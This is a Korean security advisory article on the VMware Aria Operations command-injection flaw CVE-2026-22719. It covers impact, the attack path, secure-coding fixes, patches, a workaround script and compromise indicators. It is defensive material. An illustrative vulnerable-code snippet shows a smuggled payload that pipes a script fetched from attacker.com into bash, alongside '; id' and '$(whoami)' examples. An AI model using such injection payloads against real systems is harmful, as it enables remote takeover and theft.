VMware Aria Operations CVE-2026-22719 대응과 관리 플레인 보안
CVE-2026-22719 미인증 명령 주입 취약점의 영향, 패치와 워크어라운드, VMware Aria Operations 관리 플레인 보안 설계를 정리한다.
2026-08-14 · 최초 발행 2026-04-24
VMware Aria Operations의 지원 보조 제품 마이그레이션 기능에서 CVE-2026-22719 명령 주입 취약점이 확인됐다. CVSS 8.1(Important)으로 평가된 이 결함은 인증되지 않은 공격자가 네트워크를 통해 임의 명령을 실행하고 원격 코드 실행(RCE)에 도달할 수 있는 고위험 문제다. Broadcom은 2026년 2월 24일 VMSA-2026-0001을 통해 세 가지 취약점을 공개했고, 미국 CISA는 2026년 3월 3일 CVE-2026-22719를 알려진 악용 취약점(KEV) 카탈로그에 추가하며 연방 기관에 2026년 3월 24일까지 패치를 완료하도록 요구했다.
Aria Operations는 하이브리드·멀티 클라우드 환경에서 인프라 모니터링, 용량 관리, 자동화 운영을 맡는 제어 플레인이다. vCenter와 지속적인 인증 연결을 맺고 ESXi 호스트의 구성·성능 정보를 수집하며, Active Directory를 비롯한 외부 ID 공급자와도 통합된다. 이처럼 신뢰 경계 안쪽에 자리한 플랫폼이 미인증 RCE에 노출되면 단일 서버 침해를 넘어 클라우드 인프라 전반의 장악으로 이어질 수 있다.
마이그레이션 경로에서 확인된 CVE-2026-22719
CVE-2026-22719는 VMware Aria Operations의 제품 마이그레이션 지원 기능에 존재하는 명령 주입 취약점이며, CWE-77(Improper Neutralization of Special Elements used in a Command)으로 분류된다.
| 항목 | 세부 내용 |
|---|---|
| CVE ID | CVE-2026-22719 |
| CVSS v3 점수 | 8.1 (Important) |
| Qualys 위협 점수 | 95 |
| 취약점 유형 | 명령 주입 (CWE-77) |
| 공격 벡터 | 네트워크, 인증 불필요 |
| 영향 제품 | VMware Aria Operations 8.x (8.18.6 미만) |
| 추가 영향 제품 | VMware Cloud Foundation 4.x, 5.x, 9.x |
| 추가 영향 제품 | VMware Telco Cloud Platform/Infrastructure 2.x, 3.x, 5.x |
| 공개일 | 2026년 2월 24일 (VMSA-2026-0001) |
| CISA KEV 등재일 | 2026년 3월 3일 |
| 연방 패치 기한 | 2026년 3월 24일 |
| 패치 버전 | VMware Aria Operations 8.18.6 |
VMSA-2026-0001에는 이 취약점 외에도 두 건이 함께 포함됐다. CVE-2026-22720(CVSS 8.0)은 커스텀 벤치마크 생성 기능의 저장형 XSS로, 제한된 권한의 공격자가 관리 작업을 수행할 수 있다. CVE-2026-22721(CVSS 6.2)은 vCenter 권한을 가진 공격자가 Aria Operations 관리자 권한을 얻을 수 있는 권한 상승 취약점이다. 이 결함들이 연계되면 공격 체인의 위력도 커진다.
입력값이 셸 명령으로 이어지는 지점
명령 주입은 애플리케이션이 사용자가 제공한 값을 OS 명령 일부로 직접 넘길 때 생긴다. 공격자는 ;, |, &&, `, $() 같은 셸 메타문자를 끼워 넣어 본래 의도한 명령 뒤에 다른 명령을 실행시킬 수 있다.
마이그레이션 파라미터를 셸 명령에 그대로 결합하는 패턴이 대표적이다. 공격자가 ; id 또는 $(whoami) 같은 페이로드를 넣으면, 원래 명령과 별도로 추가 명령이 처리될 수 있다.
# 취약한 패턴 (개념적 예시)
migrationTarget = user_input # 공격자가 제어 가능
os.system("migrate.sh " + migrationTarget)
# 공격자 입력: "target; curl http://attacker.com/shell.sh | bash"
# 실제 실행: migrate.sh target; curl http://attacker.com/shell.sh | bash
OWASP는 OS 명령 주입을 A03:2021(Injection) 범주로 분류한다. CISA와 NSA도 2024년 "Secure by Design Alert"에서 OS 명령 주입이 설계 단계에서 제거할 수 있는 결함이라고 명시적으로 경고했다.
CVE-2026-22719는 지원 보조 제품 마이그레이션(support-assisted product migration)이 진행 중일 때 트리거된다. Broadcom이 공개한 임시 완화 스크립트 aria-ops-rce-workaround.sh는 마이그레이션 서비스와 관련 프로세스를 중지하고, vmware-casa-workflow.sh의 비밀번호 없는 루트 실행 권한(NOPASSWD) 항목을 제거한다.
문제의 중심은 두 번째 조치다. sudoers의 NOPASSWD 항목이 있는 스크립트는 인증 절차 없이 루트 권한으로 실행될 수 있다. 마이그레이션 서비스가 동작하는 동안 외부 입력이 이 스크립트를 거쳐 OS 명령으로 전달되면 공격자는 루트 수준의 명령 실행 권한을 얻을 수 있다.
관리 플레인 침해가 확장되는 경로
이 취약점의 선결 조건은 대상 시스템에서 지원 보조 마이그레이션이 진행 중인 상태다. 마이그레이션 기능이 항상 켜져 있는 것은 아니지만, 공격자는 해당 조건을 악용하거나 기다릴 수 있다.
공격자는 Shodan, Censys 등 인터넷 스캐닝 서비스로 기본 포트 443, 8443에서 노출된 VMware Aria Operations 인스턴스를 식별할 수 있다. 관리 플랫폼이 인터넷에 직접 열려 있으면 공격 가능성은 크게 높아진다.
이후 마이그레이션 서비스 엔드포인트를 찾거나 지원 채널을 통한 사회공학으로 마이그레이션 작업을 유도할 수 있다. 인증 없이 마이그레이션 API 엔드포인트에 셸 메타문자가 든 페이로드를 전달하면, vmware-casa-workflow.sh가 NOPASSWD sudo로 실행되는 구조에서는 주입된 명령도 루트 권한으로 실행된다.
루트 셸을 얻은 뒤 공격자는 역방향 셸(reverse shell) 또는 웹셸을 어플라이언스에 심어 지속적인 접근 경로를 확보할 수 있다. Aria Operations가 vCenter, ESXi, Active Directory와 신뢰 관계를 유지한다는 점도 중요하다. 어플라이언스의 자격증명 저장소와 API 키가 노출되면 vCenter 관리자 권한, ESXi 호스트 접근권, 도메인 계정 정보로 이동할 여지가 생긴다. vCenter 관리자 권한은 가상 머신 스냅샷 삭제, 랜섬웨어 배포, 설정 변경, 데이터 유출 같은 최종 행위로 이어질 수 있다.
Aria Operations는 단순한 모니터링 도구가 아니다. 다음과 같은 권한을 가진 클라우드 운영 제어 플레인이다.
- vCenter 및 클라우드 공급자 API에 대한 관리자 수준 자격증명 보관
- ESXi 호스트 전반의 성능 및 구성 데이터 수집 권한
- 자동화 워크플로우 실행 권한 (프로비저닝, 디프로비저닝)
- Active Directory 및 외부 ID 공급자와의 통합
따라서 이 플랫폼이 침해되면 공격자는 서버 한 대만 확보하는 것이 아니라, 이미 만들어진 신뢰 경계 안에서 정상 관리 채널을 사용해 인프라 전체를 통제하게 된다.
어플라이언스 밖으로 번지는 영향
관리 어플라이언스 하나의 침해가 전체 클라우드 리소스를 위협하는 이유는 이 플랫폼이 인프라 전반의 신뢰 앵커(trust anchor)이기 때문이다.
직접적인 영향은 어플라이언스에서의 루트 권한 획득, 저장된 자격증명 및 API 키 노출, 로컬 구성과 로그 접근이다. 간접적으로는 vCenter가 관리하는 모든 VM의 스냅샷·복제·삭제, vSphere 환경 전체를 대상으로 한 랜섬웨어 배포, 수집된 운영 데이터를 활용한 표적 공격 설계가 가능해진다.
공격자가 자동화 워크플로우에 백도어를 남기면 패치 이후에도 침투 경로가 유지될 수 있다. Aria Graph(GraphQL 기반 데이터스토어)에 저장된 인프라 토폴로지 정보 역시 이후 공격 계획 수립에 활용될 수 있다.
명령 주입을 줄이는 구현 원칙
OWASP OS Command Injection Defense Cheat Sheet는 입력 검증에서 허용 목록(allowlist)을 기본 원칙으로 제시한다. 차단 목록(blocklist)은 우회 기법이 계속 발전하기 때문에 불완전한 방어가 될 가능성이 높다.
# 취약한 패턴
import os
def run_migration(target):
os.system(f"migrate.sh {target}") # 명령 주입 가능
# 안전한 패턴 (허용 목록 + 파라미터화)
import subprocess
import re
ALLOWED_TARGET_PATTERN = re.compile(r'^[a-zA-Z0-9._-]+$')
def run_migration_safe(target):
if not ALLOWED_TARGET_PATTERN.match(target):
raise ValueError("허용되지 않는 입력값")
# 명령과 인자 분리 (subprocess 리스트 방식)
subprocess.run(["migrate.sh", target], check=True)
명령 주입의 근본 원인은 명령(command)과 데이터(data)를 같은 문자열로 처리하는 데 있다. 파라미터화는 인터프리터 수준에서 이 둘을 분리해 데이터가 명령으로 해석되지 않도록 한다.
Java에서는 Runtime.exec(String) 대신 ProcessBuilder로 명령과 인자를 배열로 나눠야 한다. Python에서는 os.system() 및 subprocess.run(shell=True) 대신 subprocess.run(["cmd", "arg"])처럼 리스트 형식을 사용한다.
| 언어 | 취약한 패턴 | 안전한 패턴 |
|---|---|---|
| Python | os.system("cmd " + input) |
subprocess.run(["cmd", input]) |
| Java | Runtime.exec("cmd " + input) |
new ProcessBuilder("cmd", input) |
| Node.js | exec("cmd " + input) |
execFile("cmd", [input]) |
| Go | exec.Command("sh", "-c", "cmd "+input) |
exec.Command("cmd", input) |
CVE-2026-22719의 피해 범위를 키운 요소는 sudoers NOPASSWD 설정에 따른 루트 권한 실행이다. 최소 권한 원칙(Principle of Least Privilege)은 명령 주입이 발생했을 때 피해를 제한하는 방어선이 된다.
NOPASSWD sudo 항목은 서비스 계정에 부여할 수 있는 가장 위험한 권한 중 하나다. 마이그레이션 서비스에 루트 전체 권한이 아니라 필요한 범위의 권한만 줬다면, 명령 주입이 성공해도 공격자가 얻는 권한은 루트 RCE보다 제한적이었을 것이다.
관리 기능을 신뢰 경계 밖에서 다루는 방식
VMware Aria Operations, AWS Systems Manager, Azure Arc 같은 클라우드 관리 플랫폼은 전통적으로 신뢰할 수 있는 내부 네트워크에 두고 광범위한 신뢰를 부여받아 왔다. NIST SP 800-207의 Zero Trust 아키텍처는 이 전제를 뒤집는다.
관리 플레인에는 모든 접근에 MFA와 디바이스 신뢰 검증을 적용해야 하며, 마이그레이션 서비스처럼 특수한 기능에는 별도 승인 워크플로우가 필요하다. 마이그레이션 기능은 실제 작업 기간에만 활성화하고 사용 후 바로 중지하는 편이 바람직하다. NOPASSWD sudo는 원칙적으로 금지하며, 피할 수 없다면 허용 명령 범위를 매우 좁게 제한해야 한다.
관리 플랫폼 자체가 침해될 수 있다는 가정도 필요하다. vCenter 자격증명은 Vault(HashiCorp Vault, AWS Secrets Manager 등)에 저장하고, 동적 단기 자격증명(short-lived credentials)을 사용한다.
마이그레이션, 원격 진단, 벤더 지원 채널 같은 운영 지원 기능은 일반적으로 보안 검토가 덜 엄격한 영역이다. 이 기능들은 주 서비스와 별도 프로세스 및 네트워크 인터페이스로 격리하고, 승인된 작업 기간에만 임시 활성화해야 한다. 서비스의 활성화·비활성화와 관련 명령 실행은 별도의 변조 불가능한 로그에 남기며, 마이그레이션 서비스 접근은 벤더 지원 IP 대역으로 방화벽 제한을 둔다.
패치와 임시 완화 적용
Broadcom은 2026년 2월 24일 패치를 공개했다. 영향 제품별 업그레이드 경로는 다음과 같다.
| 제품 | 취약 버전 | 패치 버전 | 참고 |
|---|---|---|---|
| VMware Aria Operations | 8.x (8.18.6 미만) | 8.18.6 | VMSA-2026-0001 |
| VMware Cloud Foundation | 4.x, 5.x, 9.x | 각 버전별 | KB428241 |
| VMware Telco Cloud Platform | 2.x, 3.x, 5.x | 각 버전별 | KB428241 |
패치를 적용할 때는 Broadcom Support Portal에서 최신 패치를 받은 뒤 전체 어플라이언스 스냅샷을 만들고, 유지보수 창(maintenance window)에서 작업한다. 적용이 끝나면 마이그레이션 서비스 상태도 다시 확인한다.
즉시 패치하기 어려운 환경에는 Broadcom이 KB430349를 통해 워크어라운드 스크립트를 제공한다.
# Broadcom이 제공하는 임시 완화 스크립트 (개념적 설명)
# 실제 스크립트는 Broadcom KB430349 참조
# 각 Aria Operations 어플라이언스 노드에서 루트로 실행
# 1. 마이그레이션 서비스 비활성화
systemctl stop vmware-casa-migration-service
systemctl disable vmware-casa-migration-service
# 2. 취약한 sudoers 항목 제거
# vmware-casa-workflow.sh의 NOPASSWD 항목 삭제
visudo -c # 변경 후 sudoers 파일 검증
클러스터 구성에서는 모든 노드에 같은 조치를 적용해야 한다.
침해 흔적 확인과 운영상 제한
CVE-2026-22719 악용 여부를 확인할 때는 마이그레이션 서비스의 비정상 활성화, sudoers 파일 무단 변경, 루트 프로세스의 비정상 명령 로그, 의심스러운 외부 IP로의 아웃바운드 연결을 확인한다.
관리 인터페이스는 전용 관리 VLAN으로 분리하고 인터넷 직접 노출은 차단한다. 접근은 VPN 또는 Jump Host를 통해서만 허용하며, 마이그레이션 기간이 아닐 때는 관련 서비스 포트를 차단한다. 어플라이언스 SSH 접근은 특정 관리 IP로 제한하고, vCenter 연결에 쓰는 서비스 계정 자격증명은 즉시 교체한다.
CVE-2026-22719는 사용자 입력을 OS 명령에 직접 넣은 설계, 마이그레이션 서비스에 부여된 NOPASSWD sudo 루트 권한, 인증 없이 접근 가능한 마이그레이션 API 엔드포인트가 겹친 사례다. 셋 가운데 어느 하나라도 적절히 설계됐다면 미인증 RCE는 불가능했거나 피해가 크게 제한됐을 수 있다.
관리 플랫폼이 넓은 인프라 접근 권한을 가질수록 플랫폼 자체는 공격자의 우선 표적이 된다. 패치 또는 워크어라운드를 적용하고 침해 지표를 분석하는 일과 함께, 관리 플레인에 Zero Trust 원칙을 적용하고 운영 지원 기능을 격리하며 최소 권한을 유지해야 한다.
Sources
- https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36947
- https://thehackernews.com/2026/03/cisa-adds-actively-exploited-vmware.html
- https://www.bleepingcomputer.com/news/security/cisa-flags-vmware-aria-operations-rce-flaw-as-exploited-in-attacks/
- https://threatprotect.qualys.com/2026/03/04/vmware-aria-operations-vulnerability-added-to-cisa-known-exploited-vulnerabilities-catalog-cve-2026-22719/
- https://www.securityweek.com/vmware-aria-operations-vulnerability-exploited-in-the-wild/
- https://gbhackers.com/vmware-aria-flaws/
- https://www.darkreading.com/cloud-security/vmware-aria-operations-bug-exploited-cloud-risk
- https://cybersecuritynews.com/vmware-aria-operations-vulnerability-2/
- https://humeit.com/blog/vmsa-2026-0001-evaluating-risk-in-vmware-aria-operations
- https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
- https://www.cisa.gov/resources-tools/resources/secure-design-alert-eliminating-os-command-injection-vulnerabilities
- https://www.cvedetails.com/cve/CVE-2026-22719/